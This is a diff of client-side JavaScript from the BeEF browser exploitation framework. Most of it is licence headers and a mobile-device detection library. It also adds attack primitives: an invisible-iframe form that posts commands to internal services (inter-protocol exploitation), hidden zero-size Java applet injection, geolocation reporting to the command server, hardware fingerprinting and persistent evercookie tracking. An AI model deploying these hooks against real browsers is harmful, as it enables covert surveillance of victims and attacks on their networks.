     *  Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
     * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
@@ -240,7 +392,7 @@ beef.dom = {
            }
            content += "</object>";
        }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
            if (codebase != null) {
                content = "" +
@@ -259,24 +411,25 @@ beef.dom = {
            }
            content += "</applet>";
        }
-        if (beef.browser.isFF()) {
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
-            if (codebase != null) {
+//        if (beef.browser.isFF()) {
-                content = "" +
+//            if (codebase != null) {
-                    "<embed id='" + id + "' code='" + code + "' " +
+//                content = "" +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "<embed id='" + id + "' code='" + code + "' " +
-                    "height='0' width='0' name='" + name + "'>";
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-            } else {
+//                    "height='0' width='0' name='" + name + "'>";
-                content = "" +
+//            } else {
-                    "<embed id='" + id + "' code='" + code + "' " +
+//                content = "" +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "<embed id='" + id + "' code='" + code + "' " +
-                    "height='0' width='0' name='" + name + "'>";
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
-            }
+//                    "height='0' width='0' name='" + name + "'>";
-
+//            }
-            if (params != null) {
+//
-                content += beef.dom.parseAppletParams(params);
+//            if (params != null) {
-            }
+//                content += beef.dom.parseAppletParams(params);
-            content += "</embed>";
+//            }
-        }
+//            content += "</embed>";
 //        }
        $j('body').append(content);
    },
@@ -315,6 +468,30 @@ beef.dom = {
        formXsrf.submit();
        return iframeXsrf;
    },
    /**
     * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
     * @params: {String} rhost: remote host ip/domain
     * @params: {String} rport: remote port
     * @params: {String} commands: protocol commands to be executed by the remote host:port service
     */
    createIframeIpecForm: function(rhost, rport, commands){
        var iframeIpec = beef.dom.createInvisibleIframe();
        var formIpec = document.createElement('form');
        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
        formIpec.setAttribute('method',  'POST');
        formIpec.setAttribute('enctype', 'multipart/form-data');
        input = document.createElement('textarea');
        input.setAttribute('name', Math.random().toString(36).substring(5));
        input.value = commands;
        formIpec.appendChild(input);
        iframeIpec.contentWindow.document.body.appendChild(formIpec);
        formIpec.submit();
        return iframeIpec;
    }
 };
--- a/core/main/client/encode/base64.js
+++ b/core/main/client/encode/base64.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 // Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
 beef.encode = {};
--- a/core/main/client/encode/json.js
+++ b/core/main/client/encode/json.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 // Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
 beef.encode.json = {
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*!
 * @literal object: beef.geolocation
 *
@@ -41,14 +32,14 @@ beef.geolocation = {
        $j.ajax({
            error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                beef.net.send(command_url, command_id, "latitude=" + latitude
                             + "&longitude=" + longitude
                             + "&osm=UNAVAILABLE"
                             + "&geoLocEnabled=True");
                },
            success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                var jsonResp = $j.parseJSON(data);
                beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -73,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
        navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
        		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -0,0 +1,129 @@
 //
 // Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 beef.hardware = {
 	ua: navigator.userAgent,
 	cpuType: function() {
 		// IE
 		if (typeof navigator.cpuClass != 'undefined') {
 			cpu = navigator.cpuClass;
 			if (cpu == "x86")   return "32-bit";
 			if (cpu == "68K")   return "Motorola 68K";
 			if (cpu == "PPC")   return "Motorola PPC";
 			if (cpu == "Alpha") return "Digital";
 			if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
 			if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
 		// Firefox
        } else if (typeof navigator.oscpu != 'undefined') {
 			if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
 		}
 		if (navigator.platform.toLowerCase() == "win64") return "64-bit";
 		return "32-bit";
 	},
 	isTouchEnabled: function() {
 		if ('ontouchstart' in document) return true;
 		return false;
 	},
 	isVirtualMachine: function() {
 		if (screen.width % 2 || screen.height % 2) return true;
 		return false;
 	},
 	isLaptop: function() {
 		// Most common laptop screen resolution
 		if (screen.width == 1366 && screen.height == 768) return true;
 		// Netbooks
 		if (screen.width == 1024 && screen.height == 600) return true;
 		return false;
 	},
 	isNokia: function() {
 		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
 	},
 	isZune: function() {
 		return (this.ua.match('ZuneWP7')) ? true : false;
 	},
 	isHtc: function() {
 		return (this.ua.match('HTC')) ? true : false;
 	},
 	isEricsson: function() {
 		return (this.ua.match('Ericsson')) ? true : false;
 	},
 	isMotorola: function() {
 		return (this.ua.match('Motorola')) ? true : false;
 	},
 	isGoogle: function() {
 		return (this.ua.match('Nexus One')) ? true : false;
 	},
        /**
         * Returns true if the browser is on a Mobile Phone
         * @return: {Boolean} true or false
         *
         * @example: if(beef.hardware.isMobilePhone()) { ... }
         **/
        isMobilePhone: function() {
            return DetectMobileQuick();
        },
 	getName: function() {
                var ua = navigator.userAgent.toLowerCase();
                if(DetectIphone())              { return "iPhone"};
                if(DetectIpod())                { return "iPod Touch"};
                if(DetectIpad())                { return "iPad"};
 		if (this.isHtc())               { return 'HTC'};
 		if (this.isMotorola())          { return 'Motorola'};
 		if (this.isZune())              { return 'Zune'};
 		if (this.isGoogle())            { return 'Google Nexus One'};
 		if (this.isEricsson())          { return 'Ericsson'};
                if(DetectAndroidPhone())        { return "Android Phone"};
                if(DetectAndroidTablet())       { return "Android Tablet"};
                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
 		if (this.isNokia())             { return 'Nokia'};
                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
                if(DetectWindowsMobile())       { return "Windows Mobile"};
                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
                if(DetectBlackBerry())          { return "BlackBerry"};
                if(DetectPalmOS())              { return "Palm OS"};
                if(DetectPalmWebOS())           { return "Palm Web OS"};
                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
                if(DetectArchos())              { return "Archos"}
                if(DetectBrewDevice())          { return "Brew"};
                if(DetectDangerHiptop())        { return "Danger Hiptop"};
                if(DetectMaemoTablet())         { return "Maemo Tablet"};
                if(DetectSonyMylo())            { return "Sony Mylo"};
                if(DetectAmazonSilk())          { return "Kindle Fire"};
                if(DetectKindle())              { return "Kindle"};
                if(DetectSonyPlaystation())                 { return "Playstation"};
                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
                if(DetectXbox())                            { return "Xbox"};
 				if(this.isLaptop())							{ return "Laptop"};
                if(this.isVirtualMachine())                 { return "Virtual Machine"};
 		return 'Unknown';
 	}
 };
 beef.regCmp('beef.hardware');
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -1,24 +1,20 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
-// if beef.pageIsLoaded is true, then this JS has been loaded >1 times 
+/**
-// and will have a new session id. The new session id will need to know
+ * @literal object: beef.init
-// the brwoser details. So sendback the browser details again.
+ * Contains the beef_init() method which starts the BeEF client-side
 * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
 *
 * If beef.pageIsLoaded is true, then this JS has been loaded >1 times
 * and will have a new session id. The new session id will need to know
 * the brwoser details. So sendback the browser details again.
 */
-BEEFHOOK = beef.session.get_hook_session_id();
+beef.session.get_hook_session_id();
 if (beef.pageIsLoaded) {
    beef.net.browser_details();
@@ -36,7 +32,7 @@ window.onpopstate = function (event) {
            try {
                callback(event);
            } catch (e) {
-                console.log("window.onpopstate - couldn't execute callback: " + e.message);
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
            }
            return false;
        }
@@ -51,13 +47,20 @@ window.onclose = function (event) {
            try {
                callback(event);
            } catch (e) {
-                console.log("window.onclose - couldn't execute callback: " + e.message);
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
            }
            return false;
        }
    }
 };
 /**
 * Starts the polling mechanism, and initialize various components:
 *  - browser details (see browser.js) are sent back to the "/init" handler
 *  - the polling starts (checks for new commands, and execute them)
 *  - the logger component is initialized (see logger.js)
 *  - the Autorun Engine is initialized (see are.js)
 */
 function beef_init() {
    if (!beef.pageIsLoaded) {
        beef.pageIsLoaded = true;
@@ -66,14 +69,13 @@ function beef_init() {
            beef.net.browser_details();
            beef.updater.execute_commands();
            beef.logger.start();
-
+            beef.are.init();
-        }
+        }else {
        else {
            beef.net.browser_details();
            beef.updater.execute_commands();
            beef.updater.check();
            beef.logger.start();
            beef.are.init();
        }
    }
 }
--- a/core/main/client/lib/browser_jools.js
+++ b/core/main/client/lib/browser_jools.js
--- a/core/main/client/lib/evercookie.js
+++ b/core/main/client/lib/evercookie.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*
 * evercookie 0.4 (10/13/2010) -- extremely persistent cookies
 *
@@ -802,14 +793,19 @@ this.waitForSwf = function(i)
 this.evercookie_cookie = function(name, value)
 {
-	if (typeof(value) != "undefined")
+    try{
-	{
+        if (typeof(value) != "undefined")
-		// expire the cookie first
+        {
-		document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
+            // expire the cookie first
-		document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
+            document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
-	}
+            document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
-	else
+        }
-		return this.getFromStr(name, document.cookie);
+        else
            return this.getFromStr(name, document.cookie);
    }catch(e){
        // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
        // evercookie_userdata and evercookie_window will be used in this case.
    }
 };
 // get value from param-like string (eg, "x=y&name=VALUE")
--- a/core/main/client/lib/jools.min.js
+++ b/core/main/client/lib/jools.min.js
--- a/core/main/client/lib/mdetect.js
+++ b/core/main/client/lib/mdetect.js
@@ -0,0 +1,706 @@
 /* *******************************************
 // Copyright 2010-2012, Anthony Hand
 // mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
 // LICENSE INFORMATION
 // Licensed under the Apache License, Version 2.0 (the "License");
 // you may not use this file except in compliance with the License.
 // You may obtain a copy of the License at
 //        http://www.apache.org/licenses/LICENSE-2.0
 // Unless required by applicable law or agreed to in writing,
 // software distributed under the License is distributed on an
 // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
 // either express or implied. See the License for the specific
 // language governing permissions and limitations under the License.
 // *******************************************
 */
 var isIphone = false;
 var isAndroidPhone = false;
 var isTierTablet = false;
 var isTierIphone = false;
 var isTierRichCss = false;
 var isTierGenericMobile = false;
 var engineWebKit = "webkit";
 var deviceIphone = "iphone";
 var deviceIpod = "ipod";
 var deviceIpad = "ipad";
 var deviceMacPpc = "macintosh"; //Used for disambiguation
 var deviceAndroid = "android";
 var deviceGoogleTV = "googletv";
 var deviceXoom = "xoom"; //Motorola Xoom
 var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
 var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
 var deviceSymbian = "symbian";
 var deviceS60 = "series60";
 var deviceS70 = "series70";
 var deviceS80 = "series80";
 var deviceS90 = "series90";
 var deviceWinPhone7 = "windows phone os 7";
 var deviceWinMob = "windows ce";
 var deviceWindows = "windows";
 var deviceIeMob = "iemobile";
 var devicePpc = "ppc"; //Stands for PocketPC
 var enginePie = "wm5 pie";  //An old Windows Mobile
 var deviceBB = "blackberry";
 var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
 var deviceBBStorm = "blackberry95"; //Storm 1 and 2
 var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
 var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
 var deviceBBTour = "blackberry96"; //Tour
 var deviceBBCurve = "blackberry89"; //Curve 2
 var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
 var deviceBBTorch = "blackberry 98"; //Torch
 var deviceBBPlaybook = "playbook"; //PlayBook tablet
 var devicePalm = "palm";
 var deviceWebOS = "webos"; //For Palm's line of WebOS devices
 var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
 var engineBlazer = "blazer"; //Old Palm browser
 var engineXiino = "xiino";
 var deviceKindle = "kindle"; //Amazon Kindle, eInk one
 var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
 var vndwap = "vnd.wap";
 var wml = "wml";
 var deviceTablet = "tablet"; //Generic term for slate and tablet devices
 var deviceBrew = "brew";
 var deviceDanger = "danger";
 var deviceHiptop = "hiptop";
 var devicePlaystation = "playstation";
 var deviceNintendoDs = "nitro";
 var deviceNintendo = "nintendo";
 var deviceWii = "wii";
 var deviceXbox = "xbox";
 var deviceArchos = "archos";
 var engineOpera = "opera"; //Popular browser
 var engineNetfront = "netfront"; //Common embedded OS browser
 var engineUpBrowser = "up.browser"; //common on some phones
 var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
 var deviceMidp = "midp"; //a mobile Java technology
 var uplink = "up.link";
 var engineTelecaQ = 'teleca q'; //a modern feature phone browser
 var devicePda = "pda";
 var mini = "mini";  //Some mobile browsers put 'mini' in their names.
 var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
 var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
 var maemo = "maemo";
 var linux = "linux";
 var qtembedded = "qt embedded"; //for Sony Mylo and others
 var mylocom2 = "com2"; //for Sony Mylo also
 var manuSonyEricsson = "sonyericsson";
 var manuericsson = "ericsson";
 var manuSamsung1 = "sec-sgh";
 var manuSony = "sony";
 var manuHtc = "htc"; //Popular Android and WinMo manufacturer
 var svcDocomo = "docomo";
 var svcKddi = "kddi";
 var svcVodafone = "vodafone";
 var disUpdate = "update"; //pda vs. update
 var uagent = "";
 if (navigator && navigator.userAgent)
    uagent = navigator.userAgent.toLowerCase();
 function DetectIphone()
 {
   if (uagent.search(deviceIphone) > -1)
   {
      if (DetectIpad() || DetectIpod())
         return false;
      else
         return true;
   }
   else
      return false;
 }
 function DetectIpod()
 {
   if (uagent.search(deviceIpod) > -1)
      return true;
   else
      return false;
 }
 function DetectIpad()
 {
   if (uagent.search(deviceIpad) > -1  && DetectWebkit())
      return true;
   else
      return false;
 }
 function DetectIphoneOrIpod()
 {
   if (uagent.search(deviceIphone) > -1 ||
       uagent.search(deviceIpod) > -1)
       return true;
    else
       return false;
 }
 function DetectIos()
 {
   if (DetectIphoneOrIpod() || DetectIpad())
      return true;
   else
      return false;
 }
 function DetectAndroid()
 {
   if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
      return true;
   if (uagent.search(deviceHtcFlyer) > -1)
      return true;
   else
      return false;
 }
 function DetectAndroidPhone()
 {
   if (DetectAndroid() && (uagent.search(mobile) > -1))
      return true;
   if (DetectOperaAndroidPhone())
      return true;
   if (uagent.search(deviceHtcFlyer) > -1)
      return true;
   else
      return false;
 }
 function DetectAndroidTablet()
 {
   if (!DetectAndroid())
      return false;
   if (DetectOperaMobile())
      return false;
   if (uagent.search(deviceHtcFlyer) > -1)
      return false;
   if (uagent.search(mobile) > -1)
      return false;
   else
      return true;
 }
 function DetectAndroidWebKit()
 {
   if (DetectAndroid() && DetectWebkit())
      return true;
   else
      return false;
 }
 function DetectGoogleTV()
 {
   if (uagent.search(deviceGoogleTV) > -1)
      return true;
   else
      return false;
 }
 function DetectWebkit()
 {
   if (uagent.search(engineWebKit) > -1)
      return true;
   else
      return false;
 }
 function DetectS60OssBrowser()
 {
   if (DetectWebkit())
   {
     if ((uagent.search(deviceS60) > -1 ||
          uagent.search(deviceSymbian) > -1))
        return true;
     else
        return false;
   }
   else
      return false;
 }
 function DetectSymbianOS()
 {
   if (uagent.search(deviceSymbian) > -1 ||
       uagent.search(deviceS60) > -1 ||
       uagent.search(deviceS70) > -1 ||
       uagent.search(deviceS80) > -1 ||
       uagent.search(deviceS90) > -1)
      return true;
   else
      return false;
 }
 function DetectWindowsPhone7()
 {
   if (uagent.search(deviceWinPhone7) > -1)
      return true;
   else
      return false;
 }
 function DetectWindowsMobile()
 {
   if (DetectWindowsPhone7())
      return false;
   if (uagent.search(deviceWinMob) > -1 ||
       uagent.search(deviceIeMob) > -1 ||
       uagent.search(enginePie) > -1)
      return true;
   if ((uagent.search(devicePpc) > -1) &&
       !(uagent.search(deviceMacPpc) > -1))
      return true;
   if (uagent.search(manuHtc) > -1 &&
       uagent.search(deviceWindows) > -1)
      return true;
   else
      return false;
 }
 function DetectBlackBerry()
 {
   if (uagent.search(deviceBB) > -1)
      return true;
   if (uagent.search(vndRIM) > -1)
      return true;
   else
      return false;
 }
 function DetectBlackBerryTablet()
 {
   if (uagent.search(deviceBBPlaybook) > -1)
      return true;
   else
      return false;
 }
 function DetectBlackBerryWebKit()
 {
   if (DetectBlackBerry() &&
       uagent.search(engineWebKit) > -1)
      return true;
   else
      return false;
 }
 function DetectBlackBerryTouch()
 {
   if (DetectBlackBerry() &&
        ((uagent.search(deviceBBStorm) > -1) ||
        (uagent.search(deviceBBTorch) > -1) ||
        (uagent.search(deviceBBBoldTouch) > -1) ||
        (uagent.search(deviceBBCurveTouch) > -1) ))
      return true;
   else
      return false;
 }
 function DetectBlackBerryHigh()
 {
   if (DetectBlackBerryWebKit())
      return false;
   if (DetectBlackBerry())
   {
     if (DetectBlackBerryTouch() ||
        uagent.search(deviceBBBold) > -1 ||
        uagent.search(deviceBBTour) > -1 ||
        uagent.search(deviceBBCurve) > -1)
        return true;
     else
        return false;
   }
   else
      return false;
 }
 function DetectBlackBerryLow()
 {
   if (DetectBlackBerry())
   {
     if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
        return false;
     else
        return true;
   }
   else
      return false;
 }
 function DetectPalmOS()
 {
   if (uagent.search(devicePalm) > -1 ||
       uagent.search(engineBlazer) > -1 ||
       uagent.search(engineXiino) > -1)
   {
     if (DetectPalmWebOS())
        return false;
     else
        return true;
   }
   else
      return false;
 }
 function DetectPalmWebOS()
 {
   if (uagent.search(deviceWebOS) > -1)
      return true;
   else
      return false;
 }
 function DetectWebOSTablet()
 {
   if (uagent.search(deviceWebOShp) > -1 &&
       uagent.search(deviceTablet) > -1)
      return true;
   else
      return false;
 }
 function DetectGarminNuvifone()
 {
   if (uagent.search(deviceNuvifone) > -1)
      return true;
   else
      return false;
 }
 function DetectSmartphone()
 {
   if (DetectIphoneOrIpod()
      || DetectAndroidPhone()
      || DetectS60OssBrowser()
      || DetectSymbianOS()
      || DetectWindowsMobile()
      || DetectWindowsPhone7()
      || DetectBlackBerry()
      || DetectPalmWebOS()
      || DetectPalmOS()
      || DetectGarminNuvifone())
      return true;
   return false;
 };
 function DetectArchos()
 {
   if (uagent.search(deviceArchos) > -1)
      return true;
   else
      return false;
 }
 function DetectBrewDevice()
 {
   if (uagent.search(deviceBrew) > -1)
      return true;
   else
      return false;
 }
 function DetectDangerHiptop()
 {
   if (uagent.search(deviceDanger) > -1 ||
       uagent.search(deviceHiptop) > -1)
      return true;
   else
      return false;
 }
 function DetectMaemoTablet()
 {
   if (uagent.search(maemo) > -1)
      return true;
   if ((uagent.search(linux) > -1)
       && (uagent.search(deviceTablet) > -1)
       && !DetectWebOSTablet()
       && !DetectAndroid())
      return true;
   else
      return false;
 }
 function DetectSonyMylo()
 {
   if (uagent.search(manuSony) > -1)
   {
     if (uagent.search(qtembedded) > -1 ||
         uagent.search(mylocom2) > -1)
        return true;
     else
        return false;
   }
   else
      return false;
 }
 function DetectOperaMobile()
 {
   if (uagent.search(engineOpera) > -1)
   {
     if (uagent.search(mini) > -1 ||
         uagent.search(mobi) > -1)
        return true;
     else
        return false;
   }
   else
      return false;
 }
 function DetectOperaAndroidPhone()
 {
   if ((uagent.search(engineOpera) > -1) &&
      (uagent.search(deviceAndroid) > -1) &&
      (uagent.search(mobi) > -1))
      return true;
   else
      return false;
 }
 function DetectOperaAndroidTablet()
 {
   if ((uagent.search(engineOpera) > -1) &&
      (uagent.search(deviceAndroid) > -1) &&
      (uagent.search(deviceTablet) > -1))
      return true;
   else
      return false;
 }
 function DetectSonyPlaystation()
 {
   if (uagent.search(devicePlaystation) > -1)
      return true;
   else
      return false;
 };
 function DetectNintendo()
 {
   if (uagent.search(deviceNintendo) > -1   ||
 	uagent.search(deviceWii) > -1 ||
 	uagent.search(deviceNintendoDs) > -1)
      return true;
   else
      return false;
 };
 function DetectXbox()
 {
   if (uagent.search(deviceXbox) > -1)
      return true;
   else
      return false;
 };
 function DetectGameConsole()
 {
   if (DetectSonyPlaystation())
      return true;
   if (DetectNintendo())
      return true;
   if (DetectXbox())
      return true;
   else
      return false;
 };
 function DetectKindle()
 {
   if (uagent.search(deviceKindle) > -1 &&
       !DetectAndroid())
      return true;
   else
      return false;
 }
 function DetectAmazonSilk()
 {
   if (uagent.search(engineSilk) > -1)
      return true;
   else
      return false;
 }
 function DetectMobileQuick()
 {
   if (DetectTierTablet())
      return false;
   if (DetectSmartphone())
      return true;
   if (uagent.search(deviceMidp) > -1 ||
 	DetectBrewDevice())
      return true;
   if (DetectOperaMobile())
      return true;
   if (uagent.search(engineNetfront) > -1)
      return true;
   if (uagent.search(engineUpBrowser) > -1)
      return true;
   if (uagent.search(engineOpenWeb) > -1)
      return true;
   if (DetectDangerHiptop())
      return true;
   if (DetectMaemoTablet())
      return true;
   if (DetectArchos())
      return true;
   if ((uagent.search(devicePda) > -1) &&
        !(uagent.search(disUpdate) > -1))
      return true;
   if (uagent.search(mobile) > -1)
      return true;
   if (DetectKindle() ||
       DetectAmazonSilk())
      return true;
   return false;
 };
 function DetectMobileLong()
 {
   if (DetectMobileQuick())
      return true;
   if (DetectGameConsole())
      return true;
   if (DetectSonyMylo())
      return true;
   if (uagent.search(manuSamsung1) > -1 ||
 	uagent.search(manuSonyEricsson) > -1 ||
 	uagent.search(manuericsson) > -1)
      return true;
   if (uagent.search(svcDocomo) > -1)
      return true;
   if (uagent.search(svcKddi) > -1)
      return true;
   if (uagent.search(svcVodafone) > -1)
      return true;
   return false;
 };
 function DetectTierTablet()
 {
   if (DetectIpad()
        || DetectAndroidTablet()
        || DetectBlackBerryTablet()
        || DetectWebOSTablet())
      return true;
   else
      return false;
 };
 function DetectTierIphone()
 {
   if (DetectIphoneOrIpod())
      return true;
   if (DetectAndroidPhone())
      return true;
   if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
      return true;
   if (DetectWindowsPhone7())
      return true;
   if (DetectPalmWebOS())
      return true;
   if (DetectGarminNuvifone())
      return true;
   else
      return false;
 };
 function DetectTierRichCss()
 {
    if (DetectMobileQuick())
    {
       if (DetectTierIphone() || DetectKindle())
          return false;
       if (DetectWebkit())
          return true;
       if (DetectS60OssBrowser())
          return true;
       if (DetectBlackBerryHigh())
          return true;
       if (DetectWindowsMobile())
          return true;
       if (uagent.search(engineTelecaQ) > -1)
          return true;
       else
          return false;
    }
    else
      return false;
 };
 function DetectTierOtherPhones()
 {
    if (DetectMobileLong())
    {
       if (DetectTierIphone() || DetectTierRichCss())
          return false;
       else
          return true;
    }
    else
      return false;
 };
 function InitDeviceScan()
 {
    isIphone = DetectIphoneOrIpod();
    isAndroidPhone = DetectAndroidPhone();
    isTierIphone = DetectTierIphone();
    isTierTablet = DetectTierTablet();
    isTierRichCss = DetectTierRichCss();
    isTierGenericMobile = DetectTierOtherPhones();
 };
 InitDeviceScan()
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
